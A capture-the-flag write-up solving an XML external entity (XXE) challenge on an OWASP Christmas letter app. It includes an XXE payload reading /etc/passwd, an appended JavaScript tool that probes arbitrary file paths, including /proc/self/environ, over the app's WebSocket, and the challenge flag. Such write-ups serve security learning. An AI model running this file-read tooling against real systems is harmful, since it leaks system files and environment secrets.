Damjan Cvetko

Developer, System Architect, Hacker.

Challenge: It’s nearly Christmas and Santa’s very busy getting everything ready. He’s preparing his list of who’s been good. Write a letter to Santa, to let him know that you have been nice.

You can send him a letter at: http://elfs.owasp.si:3333/

This was a very nice task, I really liked it, if it weren’t for…

When the challenge opened at 01:00 the application immediately crashed. I don’t know why or who, but somebody somehow brute-forced it to the point of unresponsiveness. It stayed that way until morning, it happened during the day a few times, and I had to ask the organizers to restart the Docker container a few times.

There is a lot of goodness to be found in this one. If we SEND something, we can see the letter is posted to the server XML-encoded:

We can also see it’s an Express application…

So typical XML web challenges are about XXE (XML external entity injection). Reading up on that a bit: if the parser is misconfigured to resolve external entities, a DTD inside the submitted document can declare an entity whose SYSTEM identifier points at a local file, and wherever that entity is referenced the parser substitutes the file’s contents into the parsed text.

In our case:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<msg>TEST&xxe;</msg>

But in order to actually see this output, the app would need to send it back to us. Here we just get

{"status":"OK"}

Looking around the application a bit more, we find a JS include (client.js) that does nothing yet:

(function () {
  // TODO Implement WebSocket client
  // ws = new WebSocket(`ws://${location.host}`);
  // ...
})();

Could it be that the app has a WebSocket server?

Just typing the commented-out WebSocket code into the browser console lets us see what happens.

So we have our attack vector. It was easy to list the contents of files like /dev/random, /etc/passwd, even a bunch of things under /proc/self. But I could not find a way to LIST the files on the disk in order to find the flag. If it were PHP, then we could probably use filters to do remote execution. I then just guessed and found the answer.
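The exploration described above, written out as an added example rather than the author’s actual console session: a payload builder for an arbitrary path and a small WebSocket client that sends it and waits for the reply. Assumptions not confirmed by the post: the WebSocket server is on the same host and port as the page (which is what the `ws://${location.host}` line in client.js suggests), it accepts the same XML the SEND button posts, and it echoes the parsed message back on the socket. The function names and timeout are illustrative.

```javascript
// Added example, not the author's console session or the challenge's code.
// Assumed target: the WebSocket at the page's own host:port, as client.js hints.
const TARGET_WS = 'ws://elfs.owasp.si:3333';

// Build the XXE payload for one path: entity declared in the internal DTD subset
// and referenced inside <msg>, the same shape as the /etc/passwd payload above.
function buildPayload(filePath, entityName = 'xxe') {
  return [
    '<?xml version="1.0" encoding="UTF-8"?>',
    `<!DOCTYPE foo [<!ENTITY ${entityName} SYSTEM "file://${filePath}">]>`,
    `<msg>TEST&${entityName};</msg>`,
  ].join('\n');
}

// Open one socket, send one payload, resolve with the first message that comes
// back. One socket per probe keeps answers unambiguous; the timeout keeps a hung
// request (the box was frequently unresponsive) from blocking everything else.
function probeFile(filePath, url = TARGET_WS, timeoutMs = 5000) {
  return new Promise((resolve, reject) => {
    if (typeof WebSocket === 'undefined') {
      reject(new Error('no WebSocket global: run in a browser console or Node >= 22'));
      return;
    }
    const ws = new WebSocket(url);
    const timer = setTimeout(() => {
      ws.close();
      reject(new Error(`timeout for ${filePath}`));
    }, timeoutMs);
    ws.onopen = () => ws.send(buildPayload(filePath));
    ws.onmessage = (ev) => { clearTimeout(timer); ws.close(); resolve(String(ev.data)); };
    ws.onerror = () => { clearTimeout(timer); reject(new Error(`socket error for ${filePath}`)); };
  });
}

// Probe a list of paths sequentially and keep whatever came back (or the error),
// so one unreadable file or one dead connection does not stop the rest of the run.
async function probeMany(paths) {
  const results = {};
  for (const p of paths) {
    try {
      results[p] = await probeFile(p);
    } catch (e) {
      results[p] = `error: ${e.message}`;
    }
  }
  return results;
}
```

Paste it into the console on the challenge page and call `probeMany(['/etc/passwd', '/proc/self/cmdline', '/proc/self/environ']).then(console.log)`. Files under /proc/self are the useful ones when you cannot list a directory: cmdline and environ tell you where the application lives, which narrows the guessing.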

I have to add that when writing this up, the application was even more unresponsive than back then.

Flag: xmas{S3nd_XX3_L3tt3R_t0_S@nTa}

What did I learn: Reviewed my understanding of why XML is evil.
